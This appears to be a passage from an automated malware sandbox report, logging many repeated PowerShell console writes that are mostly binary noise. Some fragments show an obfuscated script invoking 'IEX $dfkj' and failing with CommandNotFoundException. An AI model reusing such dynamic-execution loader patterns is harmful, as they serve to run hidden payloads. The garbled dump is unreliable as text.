Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....=......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H>................7.............}..v.....>......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....E......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HF................7.............}..v.....F......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....M......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HN................7.............}..v.....N......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....S................7.............}..v....@T......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....[......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....[................7.............}..v....@\......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....p`......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(a................7.............}..v.....a......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v.....f......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k.....g................7.............}..v.... h......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3....... .......:T.k......T...............7.............}..v.....k......0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k....hl................7.............}..v.....l......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............:T.k......T...............7.............}..v.....c......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k.....c................7.............}..v....@d......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v.....k......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k.....k................7.............}..v....@l......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............:T.k......T...............7.............}..v.....q......0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k....`r................7.............}..v.....r......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....v......0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............ZU.k.....w................7.............}..v....(x......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............:T.k......T...............7.............}..v.....~......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
